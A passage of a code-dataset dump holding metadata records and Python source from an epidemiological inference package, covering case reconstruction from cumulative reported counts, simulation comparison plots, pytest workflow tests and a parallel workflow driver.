open(output,'w') as OUTPUT:\n json.dump(all_results, OUTPUT, cls=ToStr_JSONEncoder, indent=4)\n #\n # Create a YAML file with metadata\n #\n metadata = {}\n metadata['timestamp'] = str(datetime.datetime.now())\n metadata['configuration'] = {}\n for key in cfg:\n metadata['configuration'][key] = cfg[key]\n if output.endswith(\".jsn\"):\n metaoutput = output[:-4]+\"_meta.yml\"\n elif output.endswith(\".json\"):\n metaoutput = output[:-5]+\"_meta.yml\"\n else:\n metaoutput = output+\"_meta.yml\"\n print(\"Writing results metadata in file \"+metaoutput)\n with open(metaoutput, 'w') as OUTPUT:\n yaml.dump(metadata, OUTPUT)\n #\n # Print data\n #\n #for r in all_results:\n # print(r)\n\n" }, { "alpha_fraction": 0.5980559587478638, "alphanum_fraction": 0.6113574504852295, "avg_line_length": 40.260562896728516, "blob_id": "088f3a8433166b984d00d8aa6ffbe366ba9da09e", "content_id": "146e975758d50deb1bda42d4c541c6fd9d9fd4f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5864, "license_type": "no_license", "max_line_length": 152, "num_lines": 142, "path": "/epi_inference/viz/reconstruction_figs.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = [\"compare_florida_reconstruction\"]\n\nimport os\nfrom datetime import datetime\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\n\nfrom ..reconstruction.stochastic import stochastic_reconstruction\nfrom ..simulation.simulation import simulate_discrete_seiiir_stochastic\n\n\ndef compare_florida_reconstruction(seiiir_fname, reported_cases_fname, geodata_fname, output_path):\n \"\"\"\n This function runs reconstructions on data from a stochastic simulation\n and produces some figures showing the results.\n \"\"\"\n\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n # read the true data from the SEIIIR simulation\n seirdf = pd.read_csv(seiiir_fname, parse_dates=['Date'])\n seirdf['dates'] = pd.to_datetime(seirdf['Date'])\n seirdf = seirdf.set_index('dates')\n\n # read the cumulative reported cases\n crcdf = pd.read_csv(reported_cases_fname, parse_dates=['Date'])\n crcdf['dates'] = pd.to_datetime(crcdf['Date'])\n cdcdf = crcdf.set_index('dates')\n\n # read the populations\n popdf = pd.read_csv(geodata_fname)\n popdf = popdf.set_index('geoid')\n populations = 
popdf['pop2010'].to_dict()\n populations = {str(int(k)):v for k,v in populations.items()}\n \n # get the list of counties\n counties = set(seirdf.columns.to_list())\n counties.remove('Date')\n counties.remove('comp')\n counties = sorted(counties)\n\n # loop through all the counties and perform the reconstruction\n # based on the reported cases\n pdf = PdfPages(os.path.join(output_path, 'reconstruction-comparison-florida.pdf'))\n for c in counties:\n print('...', c)\n Cdates = crcdf['dates'].tolist()\n Ccases = crcdf[c].astype(int).tolist()\n dfsim_S = seirdf[seirdf['comp'] == 'S'][c]\n dfsim_E = seirdf[seirdf['comp'] == 'E'][c]\n dfsim_I1 = seirdf[seirdf['comp'] == 'I1'][c]\n dfsim_I2 = seirdf[seirdf['comp'] == 'I2'][c]\n dfsim_I3 = seirdf[seirdf['comp'] == 'I3'][c]\n dfsim_R = seirdf[seirdf['comp'] == 'R'][c]\n\n dfrecon_S = None\n dfrecon_T = None\n dfrecon_E = None\n dfrecon_I1 = None\n dfrecon_I2 = None\n dfrecon_I3 = None\n dfrecon_R = None\n\n for real in range(100):\n rdates, rcases, dates, T, S, E, I1, I2, I3, R = stochastic_reconstruction_w_stepsize(Cdates, Ccases, populations[c], 4, fixed_delay=True)\n\n if dfrecon_S is None:\n dfrecon_S = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfrecon_T = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfrecon_E = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfrecon_I1 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfrecon_I2 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfrecon_I3 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfrecon_R = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n\n dfrecon_S['{}'.format(real)] = S\n dfrecon_T['{}'.format(real)] = T\n dfrecon_E['{}'.format(real)] = E\n dfrecon_I1['{}'.format(real)] = I1\n dfrecon_I2['{}'.format(real)] = I2\n dfrecon_I3['{}'.format(real)] = I3\n dfrecon_R['{}'.format(real)] = R\n\n ax = dfrecon_S.plot(color='silver', legend=False)\n dfsim_S[dfsim_S.index.isin(dfrecon_S.index)].plot(ax=ax, color='black', legend='Simulated S')\n plt.title('S comparison')\n pdf.savefig()\n plt.close()\n\n ax = dfrecon_E.plot(color='silver', legend=False)\n dfsim_E[dfsim_E.index.isin(dfrecon_E.index)].plot(ax=ax, color='black', legend='Simulated E')\n plt.title('E comparison')\n pdf.savefig()\n plt.close()\n\n ax = dfrecon_I1.plot(color='silver', legend=False)\n dfsim_I1[dfsim_I1.index.isin(dfrecon_I1.index)].plot(ax=ax, color='black', legend='Simulated I1')\n plt.title('I1 comparison')\n pdf.savefig()\n plt.close()\n\n ax = dfrecon_I2.plot(color='silver', legend=False)\n dfsim_I2[dfsim_I2.index.isin(dfrecon_I2.index)].plot(ax=ax, color='black', legend='Simulated I2')\n plt.title('I2 comparison')\n pdf.savefig()\n plt.close()\n\n ax = dfrecon_I3.plot(color='silver', legend=False)\n dfsim_I3[dfsim_I3.index.isin(dfrecon_I3.index)].plot(ax=ax, color='black', legend='Simulated I3')\n plt.title('I3 comparison')\n pdf.savefig()\n plt.close()\n\n ax = dfrecon_R.plot(color='silver', legend=False)\n dfsim_R[dfsim_R.index.isin(dfrecon_R.index)].plot(ax=ax, color='black', legend='Simulated R')\n lower_percentile = dfrecon_R.quantile(0.025, axis=1)[dfrecon_R.index[-1]]\n upper_percentile = dfrecon_R.quantile(0.975, axis=1)[dfrecon_R.index[-1]]\n sim_value = dfsim_R[dfrecon_R.index[-1]]\n msg = ''\n if sim_value < lower_percentile or sim_value > upper_percentile:\n msg = '*'\n print('Simulated R outside of 95th percentiles for count {}: ({} ({}) {}) {}'.format(c, 
lower_percentile, sim_value, upper_percentile, msg))\n\n plt.title('R comparison ({} ({}) {}) {}'.format(lower_percentile, sim_value, upper_percentile, msg))\n pdf.savefig()\n plt.close()\n\n pdf.close()\n\n\n\nif __name__ == '__main__':\n np.random.seed(1975)\n seiiir_fname = './data/FL_SEIIIR_R0_2.25_realization_42.csv'\n reported_cases_fname = './data/FL_reported_cases_R0_2.25_realization_42.csv'\n geodata_fname = './data/geodata.csv'\n output_path = './figures/'\n \n compare_florida_reconstruction(seiiir_fname, reported_cases_fname, geodata_fname, output_path)\n \n" }, { "alpha_fraction": 0.6252723336219788, "alphanum_fraction": 0.6686472296714783, "avg_line_length": 48.009708404541016, "blob_id": "1dadaafcbd4d3df8a3f14e517cf0b28477b6adc3", "content_id": "5d980eb199ab1dce4cf33c7e5477aa5007a25374", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5049, "license_type": "no_license", "max_line_length": 162, "num_lines": 103, "path": "/epi_inference/reconstruction/tests/test_recon_workflows.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport os\nimport os.path\nimport pandas as pd\nimport shutil\nfrom pyomo.common import fileutils as fileutils\nfrom pyutilib.misc import Options as Options\n\nfrom epi_inference.engine import driver\nfrom epi_inference.util import compare_csv, compare_json\n\nkeepfiles = False\n\nclass TestReconstruct():\n @classmethod\n def setup_class(cls):\n cls._origdir = os.getcwd()\n thisfiledir = fileutils.this_file_dir()\n os.chdir(thisfiledir)\n\n @classmethod\n def teardown_class(cls):\n os.chdir(cls._origdir)\n\n def test_reconstruct_deterministic(self):\n args = Options()\n args.block = 'deterministic'\n args.config_file = './config_files/reconstruct_case.yml'\n args.verbose = True\n driver.run(args)\n \n # check that the json files load into dataframes that have the correct numbers and shapes\n outputdf, golddf = compare_json('./output/recon_countydata1_all.json', './baseline/recon_countydata1_all.json')\n outputdf, golddf = compare_json('./output/recon_countydata1_12011.json', './baseline/recon_countydata1_12011.json')\n \n # cleanup the files we created\n if not keepfiles:\n os.remove('./output/recon_countydata1_all.json')\n os.remove('./output/recon_countydata1_all_meta.yml')\n os.remove('./output/recon_countydata1_12011.json')\n os.remove('./output/recon_countydata1_12011_meta.yml')\n\n def test_reconstruct_stochastic(self):\n args = Options()\n args.block = 'stochastic'\n args.config_file = './config_files/reconstruct_case.yml'\n args.verbose = True\n driver.run(args)\n \n # check that the json files load into dataframes that have the correct numbers and shapes\n outputdf, golddf = compare_json('./output/recon_stoch_countydata1_all_38479387.json', './baseline/recon_stoch_countydata1_all_38479387.json')\n outputdf, golddf = compare_json('./output/recon_stoch_countydata1_all_39847938.json', './baseline/recon_stoch_countydata1_all_39847938.json')\n outputdf, golddf = compare_json('./output/recon_stoch_countydata1_12011.json', './baseline/recon_stoch_countydata1_12011.json')\n \n # cleanup the files we created\n if not keepfiles:\n os.remove('./output/recon_stoch_countydata1_all_38479387.json')\n os.remove('./output/recon_stoch_countydata1_all_38479387_meta.yml')\n os.remove('./output/recon_stoch_countydata1_all_39847938.json')\n os.remove('./output/recon_stoch_countydata1_all_39847938_meta.yml')\n os.remove('./output/recon_stoch_countydata1_12011.json')\n 
os.remove('./output/recon_stoch_countydata1_12011_meta.yml')\n\n def test_recon_json2csv(self):\n args = Options()\n args.block = 'json2csv'\n args.config_file = './config_files/reconstruct_case.yml'\n args.verbose = True\n driver.run(args)\n \n # check that the json files load into dataframes that have the correct numbers and shapes\n outputdf, golddf = compare_csv('./output/recon_stoch_countydata1_all_38479387_flatten.csv', './baseline/recon_stoch_countydata1_all_38479387_flatten.csv')\n outputdf, golddf = compare_csv('./output/recon_stoch_countydata1_all_flatten.csv', './baseline/recon_stoch_countydata1_all_flatten.csv')\n outputdf, golddf = compare_csv('./output/recon_stoch_countydata1_all_38479387_narrow.csv', './baseline/recon_stoch_countydata1_all_38479387_narrow.csv')\n outputdf, golddf = compare_csv('./output/recon_stoch_countydata1_all_narrow.csv', './baseline/recon_stoch_countydata1_all_narrow.csv')\n \n df_flatten = pd.read_csv('./output/recon_stoch_countydata1_all_38479387_flatten.csv')\n df_narrow = pd.read_csv('./output/recon_stoch_countydata1_all_38479387_narrow.csv')\n\n assert(df_narrow.shape[1] == (df_flatten.shape[1]-8+2))\n assert(df_narrow.shape[0] == 8*df_flatten.shape[0])\n assert(df_narrow.size == (8*df_flatten.shape[0]) * (df_flatten.shape[1]-8+2))\n\n # cleanup the files we created\n if not keepfiles:\n os.remove('./output/recon_stoch_countydata1_all_38479387_flatten.csv')\n os.remove('./output/recon_stoch_countydata1_all_flatten.csv')\n os.remove('./output/recon_stoch_countydata1_all_38479387_narrow.csv')\n os.remove('./output/recon_stoch_countydata1_all_narrow.csv')\n \n def test_recon_summary(self):\n args = Options()\n args.block = 'recon_summary'\n args.config_file = './config_files/reconstruct_case.yml'\n args.verbose = True\n driver.run(args)\n \n # check that the json files load into dataframes that have the correct numbers and shapes\n outputdf, golddf = compare_csv('./output/recon_stoch_countydata1_all_summary.csv', './baseline/recon_stoch_countydata1_all_summary.csv')\n \n # cleanup the files we created\n if not keepfiles:\n os.remove('./output/recon_stoch_countydata1_all_summary.csv')\n\n" }, { "alpha_fraction": 0.6023255586624146, "alphanum_fraction": 0.604044497013092, "avg_line_length": 38.71485900878906, "blob_id": "8ba080f6e16f464f4f35119a17702c095724a6e9", "content_id": "66423b3b48c7a73c8d3c48c1c82ec70b021c902b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9890, "license_type": "no_license", "max_line_length": 150, "num_lines": 249, "path": "/epi_inference/engine/driver.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['driver', 'run', 'run_block_multiworkflow']\n\nimport os\nimport sys\nimport datetime\nimport argparse\nimport yaml\nimport pprint\nfrom pyutilib.misc import Options, timing\nimport pyutilib.services\ntry:\n import joblib\n joblib_available = True\nexcept:\n joblib_available = False\n\nfrom .task_registry import registered_tasks\nfrom .util import factorial_iterator, load_configfile\nfrom .config_parameters import set_config_parameters, get_config_parameters\nfrom .misc import save_metadata\n\nglobal_tempdir = None\n\ndef driver(tmpdir=None, command='unknown'):\n if os.environ.get('TMPDIR',tmpdir) is not None:\n _tmpdir = os.environ.get('TMPDIR',tmpdir)\n if not os.path.exists(_tmpdir):\n os.makedirs(_tmpdir)\n #os.environ['TMPDIR'] = tmpdir\n pyutilib.services.TempfileManager.tempdir = _tmpdir\n global global_tempdir\n 
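        # Remember the temporary directory at module scope so that run_workflow can
        # point pyutilib's TempfileManager at the same location inside each
        # (possibly joblib-spawned) worker process.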
global_tempdir = _tmpdir\n\n Parser = argparse.ArgumentParser(description='inference models')\n Parser.add_argument('-c', '--catch-errors', action='store_true', default=False,\n help='Catch exceptions')\n Parser.add_argument('-q', '--quiet', action='store_true', default=False,\n help='Suppress diagnostic')\n Parser.add_argument('-v', '--verbose', action='store_true', default=False,\n help='Verbosity flag')\n Parser.add_argument('-P', '--parallelize-workflows', action='store_true', default=False,\n help='Parallelize the execution of all workflows. This option parallelizes all workflows and their factors.')\n Parser.add_argument('-p', '--parallelize-factors', action='store_true', default=False,\n help='Parallelize the execution of factors for each workflow if there are enough of them (>= MIN_PARALLEL_WORKFLOWS).')\n Parser.add_argument('--np', action='store', type=int, default=2,\n help='Number of processors used to parallelize workflows. (default=2)')\n Parser.add_argument('--min-parallel-workflows', action='store', type=int, default=2,\n help='Minimum number of workflows that are needed to use parallelization. (default=2)')\n Parser.add_argument('--help-workflows', action='store_true', default=False,\n help='Print all available workflows')\n Parser.add_argument('block', help='Name of block in the config file that will be executed', default=None)\n Parser.add_argument('config_file', help='YAML configuration file', default=None)\n #\n # Parse sys.argv\n #\n args = Parser.parse_args()\n if not args.quiet:\n timing.tic('Starting '+command)\n if args.catch_errors:\n run(args)\n else:\n try:\n run(args)\n except Exception as e:\n print(\"Error: \"+str(e))\n if not args.quiet:\n timing.toc('Finishing '+command)\n\n\ndef run_workflow(task, CONFIG, data, tempdir):\n if tempdir:\n pyutilib.services.TempfileManager.tempdir = tempdir\n print(\"\\nExecuting Workflow: \"+task.name)\n task.run( data, CONFIG )\n\n\ndef run_block_serial(workflow_blocks, args, config_parameters):\n #\n # Serially execute all workflows and their factors\n #\n tasks = registered_tasks()\n for cargs in workflow_blocks[args.block]:\n workflow = cargs.get('workflow', None)\n if workflow is None:\n print(\"WARNING: No workflow specified in '%s' block\" % args.block)\n continue\n if not 'verbose' in cargs:\n cargs['verbose'] = args.verbose\n #\n # Launch the task that is named by\n #\n if 'factors' in cargs:\n config_list = factorial_iterator(cargs['factors'], cargs, config_parameters)\n else:\n config_list = factorial_iterator({}, cargs, config_parameters)\n\n for CONFIG in config_list:\n workflow = CONFIG['workflow']\n if workflow not in tasks:\n print(\"WARNING: Unknown workflow '%s' specified in block\" % workflow)\n continue\n run_workflow(tasks[workflow], CONFIG, workflow_blocks, global_tempdir)\n\n\ndef run_block_parallel_factors(workflow_blocks, args, config_parameters):\n #\n # Serially execute all workflows, but parallelize the execution of workflow factors\n #\n tasks = registered_tasks()\n for cargs in workflow_blocks[args.block]:\n workflow = cargs.get('workflow', None)\n if workflow is None:\n print(\"WARNING: No workflow specified in '%s' block\" % args.block)\n continue\n if not 'verbose' in cargs:\n cargs['verbose'] = args.verbose\n #\n # Launch the task that is named by\n #\n if 'factors' in cargs:\n config_list = list(factorial_iterator(cargs['factors'], cargs, config_parameters))\n else:\n config_list = list(factorial_iterator({}, cargs, config_parameters))\n\n if len(config_list) >= 
args.min_parallel_workflows:\n # Parallel\n good_configs = []\n for CONFIG in config_list:\n if workflow not in tasks:\n print(\"WARNING: Unknown workflow '%s' specified in block\" % workflow)\n continue\n good_configs.append( CONFIG )\n with joblib.Parallel(n_jobs=args.np, verbose=args.verbose*10) as parallel:\n parallel( joblib.delayed(run_workflow)(tasks[CONFIG['workflow']], CONFIG, workflow_blocks, global_tempdir) for CONFIG in good_configs)\n else:\n # Serial\n for CONFIG in config_list:\n workflow = CONFIG['workflow']\n if workflow not in tasks:\n print(\"WARNING: Unknown workflow '%s' specified in block\" % workflow)\n continue\n run_workflow(tasks[workflow], CONFIG, workflow_blocks, global_tempdir)\n\ndef run_block_parallel_workflows(workflow_blocks, args, config_parameters):\n #\n # Parallelize execution of workflows and workflow factors\n #\n tasks = registered_tasks()\n workflows = []\n for cargs in workflow_blocks[args.block]:\n workflow = cargs.get('workflow', None)\n if workflow is None:\n print(\"WARNING: No workflow specified in '%s' block\" % args.block)\n continue\n if not 'verbose' in cargs:\n cargs['verbose'] = args.verbose\n #\n # Launch the task that is named by\n #\n if 'factors' in cargs:\n config_list = list(factorial_iterator(cargs['factors'], cargs, config_parameters))\n else:\n config_list = factorial_iterator({}, cargs, config_parameters)\n\n for CONFIG in config_list:\n if workflow not in tasks:\n print(\"WARNING: Unknown workflow '%s' specified in block\" % workflow)\n continue\n workflows.append( CONFIG )\n\n if len(workflows) >= args.min_parallel_workflows:\n # Parallel\n with joblib.Parallel(n_jobs=args.np, verbose=args.verbose*10) as parallel:\n parallel( joblib.delayed(run_workflow)(tasks[CONFIG['workflow']], CONFIG, workflow_blocks, global_tempdir) for CONFIG in workflows)\n else:\n # Serial\n for CONFIG in workflows:\n workflow = CONFIG['workflow']\n run_workflow(tasks[workflow], CONFIG, workflow_blocks, global_tempdir)\n\n\ndef run_block_multiworkflow(CONFIG, warnings, config):\n for block in CONFIG['blocks']:\n np = int(CONFIG.get('num_processes',1))\n if np > 1:\n if CONFIG.get('parallel_workflows',False):\n args = Options(block=block,\n np=np,\n parallelize_workflow=True,\n verbose=CONFIG['verbose'],\n min_parallel_workflows=10)\n run_block_parallel_workflows(config, args, get_config_parameters())\n else:\n args = Options(block=block,\n np=np,\n parallelize_factors=True,\n verbose=CONFIG['verbose'],\n min_parallel_workflows=10)\n run_block_parallel_factors(config, args, get_config_parameters())\n else:\n args = Options(block=block, verbose=CONFIG['verbose'])\n run_block_serial(config, args, get_config_parameters())\n\n save_metadata(CONFIG, warnings)\n\n\ndef run(args):\n #\n #\n # Get help information\n #\n if args.help_workflows:\n tasks = registered_tasks()\n print(\"\")\n print(\"Available Workflows\")\n print(\"-------------------\")\n for t in sorted(tasks.keys()):\n print(t)\n print(\" \"+tasks[t].description)\n return\n #\n # Load the YAML configuration file\n #\n workflow_blocks = load_configfile(args.config_file)\n if args.verbose:\n print(\"Configuration Arguments\")\n pp = pprint.PrettyPrinter(indent=4)\n pp.pprint(get_config_parameters())\n pp.pprint(workflow_blocks)\n print(\"\")\n #\n # Iterate over all workflow blocks for the specified subcommand\n #\n if not (args.block in workflow_blocks):\n print(\"WARNING: No workflow block '%s' specified\" % args.block)\n return\n\n if not joblib_available and (args.parallelize_workflows or 
args.parallelize_factors):\n print(\"ERROR: Cannot parallelize workflows. The 'joblib' packages is not installed.\")\n return\n\n if args.parallelize_workflows and args.np > 1:\n run_block_parallel_workflows(workflow_blocks, args, get_config_parameters())\n\n elif args.parallelize_factors and args.np > 1:\n run_block_parallel_factors(workflow_blocks, args, get_config_parameters())\n\n else:\n run_block_serial(workflow_blocks, args, get_config_parameters())\n\n" }, { "alpha_fraction": 0.7714285850524902, "alphanum_fraction": 0.7714285850524902, "avg_line_length": 19, "blob_id": "bd021a7a262af248dbd5a815db7c2610a26511b8", "content_id": "8fe8f691cd48d6e34329ef1393d8f079f605bd76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 140, "license_type": "no_license", "max_line_length": 27, "num_lines": 7, "path": "/epi_inference/__init__.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "# The epi_inference package\n\nfrom . import engine\nfrom . import collect\nfrom . import formulations\nfrom . import workflow\nfrom . import viz\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 11, "blob_id": "fd9623354dc6864bdede729f67e0c2db13631e21", "content_id": "eab97bc4506a801e6909761e6538cb69d791a428", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 35, "license_type": "no_license", "max_line_length": 20, "num_lines": 3, "path": "/R_utilities/test.R", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "require(MASS)\n\nprint('Hello Bill!')" }, { "alpha_fraction": 0.5224858522415161, "alphanum_fraction": 0.5240678191184998, "avg_line_length": 37.8070182800293, "blob_id": "c6b566597bb286152f70ac8486fbf553bb66bd15", "content_id": "93bc95050545f7c802e0b96294e017f0c88a1135", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4425, "license_type": "no_license", "max_line_length": 104, "num_lines": 114, "path": "/epi_inference/ATTIC/collect.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import csv\nimport sys\nimport argparse\nimport yaml\nimport os.path\nimport shutil\nimport datetime\nimport pprint\nfrom .util import factorial_iterator\n\nfrom .load_results import load_df_expdata, load_df_casedata\n\n\ndef save_output(cargs, df, verbose, data=None):\n if verbose:\n print(\"Data Summary\")\n print(df)\n print(\"\")\n \n ofname = cargs[\"output\"]\n print(\"Writing file: \"+ofname)\n filedir = os.path.dirname(ofname)\n if filedir and not os.path.exists(filedir): # pragma: no cover\n os.makedirs(filedir)\n if verbose and os.path.exists(ofname): # pragma: no cover\n print(\" WARNING: over-writing file \"+ofname)\n df.to_csv(ofname, quoting=csv.QUOTE_NONNUMERIC)\n #\n if os.path.exists(os.path.join(cargs[\"dir\"], \"geodata.csv\")):\n shutil.copyfile(os.path.join(cargs[\"dir\"], \"geodata.csv\"), ofname[:-4]+\"_geodata.csv\") \n #\n # Create a YAML file with metadata\n #\n metadata = {}\n metadata['timestamp'] = str(datetime.datetime.now())\n metadata['configuration'] = {}\n for key in cargs:\n metadata['configuration'][key] = cargs[key]\n if not data is None and len(data) > 0:\n metadata['simulation parameters'] = data\n dfile = ofname[:-4]+\"_meta.yml\"\n print(\"Writing file: \"+dfile)\n with open(dfile, 'w') as OUTPUT:\n yaml.dump(metadata, OUTPUT)\n\ndef run(args):\n #\n # Load the YAML configuration file\n #\n 
with open(args.config_file, 'r') as INPUT:\n try:\n config = yaml.safe_load(INPUT)\n except yaml.YAMLError as exc: # pragma: nocover\n print(\"ERROR: problem parsing YAML file\")\n print(exc)\n sys.exit(1)\n if args.verbose:\n print(\"Configuration Arguments\")\n pp = pprint.PrettyPrinter(indent=4)\n pp.pprint(config)\n print(\"\")\n\n if 'expdata' in config:\n #\n # Process experimental data. We assume that data is organized\n # within a subdirectory in separate directories named 'exp<id>'.\n # See the epi_inference/examples/expdata directory structure for\n # an example.\n #\n cargs = config['expdata']\n for i in range(len(cargs)):\n if 'factors' in cargs[i]:\n config_list = factorial_iterator(cargs[i]['factors'], cargs[i])\n else:\n config_list = [cargs[i]]\n\n for CONFIG in config_list:\n df, data = load_df_expdata(expdir=CONFIG[\"dir\"],\n county=CONFIG[\"county\"],\n trial=CONFIG.get('trial',None),\n days_before_first=CONFIG.get(\"days_before_first\", None),\n days_after_first=CONFIG.get(\"days_after_first\",None),\n expnum=CONFIG[\"expnum\"])\n\n if df is None: # pragma: no cover\n print(\"ERROR: no experimental data loaded\")\n sys.exit(1)\n save_output(CONFIG, df, args.verbose, data=data)\n\n elif 'casedata' in config:\n #\n # Process county case data. We assume that data is organized within\n # a single directory, where each CSV file reports case data for a single\n # county. See the epi_inference/examples/countydata directory structure for\n # an example.\n #\n cargs = config['casedata']\n for i in range(len(cargs)):\n if 'factors' in cargs[i]:\n config_list = factorial_iterator(cargs[i]['factors'], cargs[i])\n else:\n config_list = [cargs[i]]\n\n for CONFIG in config_list:\n df = load_df_casedata(CONFIG[\"files\"],\n datadir=CONFIG[\"dir\"],\n datacol=CONFIG.get(\"column\", None),\n days_before_first=CONFIG.get(\"days_before_first\", None),\n days_after_first=CONFIG.get(\"days_after_first\",None))\n\n if df is None: # pragma: no cover\n print(\"ERROR: no case data loaded\")\n sys.exit(1)\n save_output(CONFIG, df, args.verbose)\n\n" }, { "alpha_fraction": 0.6194690465927124, "alphanum_fraction": 0.6194690465927124, "avg_line_length": 25.076923370361328, "blob_id": "ffb81f7991f89e54062ade47c75dd1b8733e3398", "content_id": "beb850d094a2f8ca4ba224ca904170df23f56889", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 339, "license_type": "no_license", "max_line_length": 65, "num_lines": 13, "path": "/epi_inference/epiinf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import os\nfrom . 
import workflow\nfrom epi_inference.engine.driver import driver\n \ndef main():\n if \"HOME\" in os.environ:\n tmpdir = os.path.join(os.environ[\"HOME\"],\".epiinf\",\"tmp\")\n else:\n tmpdir = os.path.join(os.getcwd(),\"epiinf_tmp\")\n driver(tmpdir=tmpdir, command='epiinf')\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.648134708404541, "alphanum_fraction": 0.6516472697257996, "avg_line_length": 46.99418640136719, "blob_id": "db217b78fdda33f27e43a80d7c604b07843f4e6d", "content_id": "088a845d335561c313e7f1a686602b9e607567cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8256, "license_type": "no_license", "max_line_length": 119, "num_lines": 172, "path": "/epi_inference/reconstruction/common.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "from datetime import datetime, timedelta\nimport numpy as np\nfrom pyutilib.misc.misc import Bunch\n\n\"\"\"\nThis module provides some common functions used for reconstruction\ncomputations.\n\"\"\"\n\"\"\"\n# draft of a decorator that forces named arguments\ndef force_keyword_args(func):\n def force_keyword_args_wrapper(func, *args, **kwargs):\n if len(args) != 0:\n raise SyntaxError('function {} accepts keyword arguments only'.format(str(func)))\n\n return func(**kwargs)\n return force_keyword_args_wrapper(func)\n\"\"\"\n\ndef reported_cases_from_cumulative(*, dates, cumulative_reported_cases):\n \"\"\"\n This function takes the cumulative reported cases (by day) and does\n the difference to return the number of reported cases within each day.\n It requires that the cumulative reported cases start at zero since\n the models in this module assume a fully suspectible population at\n the start.\n\n Parameters\n ----------\n dates : list of datetime objects\n This is the dates for each of the reported cases using a python datetime object.\n \n cumulative_reported_cases : list of numbers\n This is a list of the cumulative reported cases. The list must include\n all cases (i.e., start at zero) in order to be consistent with other model\n assumptions in the reconstruction module.\n \"\"\"\n if cumulative_reported_cases[0] != 0:\n # This is necessary since we assume that S0, E0, and I0 are all zero.\n # Therefore, we need to start well before the beginning of the\n # reported cases\n raise ValueError('reported_cases_from_cumulative: The first'\n ' data point in cumulative_reported_cases must'\n ' be zero. These procedures assume the data spans'\n ' the entire timeline.'\n )\n\n if len(cumulative_reported_cases) != len(dates):\n raise ValueError(\"The length of the dates list is not the same as the \"\n \"cumulative_reported_cases list\")\n \n cumul_rep_cases = cumulative_reported_cases\n reported_cases = [j-i for i,j in zip(cumul_rep_cases, cumul_rep_cases[1:])]\n assert len(reported_cases) == len(cumul_rep_cases)-1\n reported_cases_dates = dates[1:]\n assert len(reported_cases_dates) == len(dates)-1\n\n # sanity check - the cumulative reported cases should be non-decreasing\n # therefore, we should not have any negative reported cases\n if not all([c >= 0 for c in reported_cases]):\n raise ValueError('reported_cases_from_cumulative: Negative reported'\n ' cases detected for an interval. 
cumulative_reported_cases'\n ' must be a list of non-decreasing numbers.')\n \n return Bunch(dates=reported_cases_dates, values=reported_cases)\n\ndef df_reported_cases_from_cumulative(df_cumulative_reported_cases):\n \"\"\"\n This function takes the cumulative reported cases (by day) as a Pandas\n dataframe where each column is a different county (node) and just\n the difference to return a new dataframe with the number of reported\n cases within each day.\n\n It requires that the cumulative reported cases start for each county\n start at zero since the models in this module assume a fully suspectible population at\n the start.\n\n Parameters\n ----------\n df_cumulative_reported_cases : DataFrame\n This is a dataframe that contains cumulative reported cases. Each row\n corresponds to a different day, and each column is a different county (node).\n The index should be the 'date' column.\n The cumulative reported cases must all start at zero in order to be\n consistent with other model assumptions in the reconstruction module.\n \"\"\"\n first_row = df_cumulative_reported_cases.iloc[0]\n first_row = first_row.drop(['date'])\n if (first_row != 0).any():\n # This is necessary since we assume that S0, E0, and I0 are all zero.\n # Therefore, we need to start well before the beginning of the\n # reported cases\n raise ValueError('df_reported_cases_from_cumulative: The first'\n ' row for df_cumulative_reported_cases must'\n ' all be zero. These procedures assume the data spans'\n ' the entire timeline (from prior to the initial reported'\n ' case.'\n '\\nFirst row:\\n{}'.format(first_row)\n )\n\n df_reported_cases = df_cumulative_reported_cases.set_index('date')\n df_reported_cases = df_reported_cases.diff()\n df_reported_cases = df_reported_cases.drop(df_reported_cases.index[0])\n\n # sanity check - the cumulative reported cases should be non-decreasing\n # therefore, we should not have any negative reported cases\n if (df_reported_cases < 0).any(axis=None):\n raise ValueError('df_reported_cases_from_cumulative: Negative reported'\n ' cases detected for an interval. Columns in df_cumulative_reported_cases'\n ' must all be non-decreasing.')\n\n return df_reported_cases\n\ndef np_reported_cases_from_cumulative(*, dates, counties, cumulative_reported_cases):\n \"\"\"\n This function takes the cumulative reported cases (by day) and returns the\n new cases within each day.\n\n It requires that the cumulative reported cases start for each county\n start at zero since the models in this module assume a fully suspectible population at\n the start.\n\n Parameters\n ----------\n dates : numpy array of datetime objects\n The dates corresponding to the rows in the cumulative reported cases\n counties : numpy array of object (strings)\n The names of the counties (or nodes) corresponding to the columns in the\n cumulative reported cases\n cumulative_reported_cases : Numpy two-dimensional array\n This is a numpy array that contains cumulative reported cases. Each row\n 